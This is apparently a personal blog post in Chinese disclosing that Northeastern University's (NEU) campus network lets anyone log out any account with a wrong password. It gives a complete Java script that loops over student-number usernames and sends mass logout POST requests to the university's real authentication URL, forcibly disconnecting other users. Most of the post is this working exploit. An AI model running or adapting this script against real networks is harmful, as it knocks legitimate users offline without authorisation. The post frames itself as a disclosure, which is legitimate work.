［２０１６.9.27］neu校园网漏洞

第一次使用java进行网络编程，之前已经发现neu的校园网只要输入账号就可以随意断开网络．
neu的校园网账号是形式比较规整，按照学号排列的，只要输入学号，之后密码随便填写，按照network中post的格式进行填写就可以了，试了一下，可以成功地断开校园网．
之后可尝试一下用java写爬虫，，，
希望网络中心能尽快修正．

package com.sjming;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;

public class test {


    public static void main(String[] args) {

        String url = "http://ipgw.neu.edu.cn:803/include/auth_action.php";
        URL httpUrl;
        URL httpUrl1;

        try {

            for(int i=xxx;i<=xxx;i++) {
                httpUrl = new URL(url);
                HttpURLConnection connection = (HttpURLConnection)httpUrl.openConnection();
                connection.setRequestMethod("POST");
                connection.setDoInput(true);
                connection.setDoOutput(true);
                connection.setRequestProperty("connection", "Keep-Alive");  
                connection.setRequestProperty("Charsert", "UTF-8");  
                connection.connect();  

                OutputStream outputStream = connection.getOutputStream();
                String content = "action=logout&username=stu_"+ i +"&password=1234&ajax=1";
                outputStream.write(content.getBytes());

                BufferedReader reader = new BufferedReader(new InputStreamReader(connection.getInputStream()));
                StringBuffer sb = new StringBuffer();
                String str;
                while((str = reader.readLine()) != null) {
                    sb.append(str);
                }
                System.out.println(content);
                System.out.print("result:"+sb.toString());


                //以下代码无法正常运行，原因不明
                httpUrl1 = new URL(url);
                HttpURLConnection connection1 = (HttpURLConnection)httpUrl1.openConnection();
                connection1.setRequestMethod("POST");
                connection1.setDoInput(true);
                connection1.setDoOutput(true);
                connection1.setRequestProperty("connection", "Keep-Alive");  
                connection1.setRequestProperty("Charsert", "UTF-8");  
                connection1.connect();  

                OutputStream outputStream1 = connection1.getOutputStream();
                String content1 = "action=logout&username="+ i +"&password=1234&ajax=1";
                outputStream1.write(content1.getBytes());
                BufferedReader reader1 = new BufferedReader(new InputStreamReader(connection1.getInputStream()));
                StringBuffer sb1 = new StringBuffer();
                String str1;
                while((str1 = reader1.readLine()) != null) {
                    sb1.append(str1);
                }
                System.out.println(" result:"+sb1.toString());
            }
        } catch (MalformedURLException e) {
            e.printStackTrace();
        }catch (IOException e) {
            e.printStackTrace();
        }

    }

}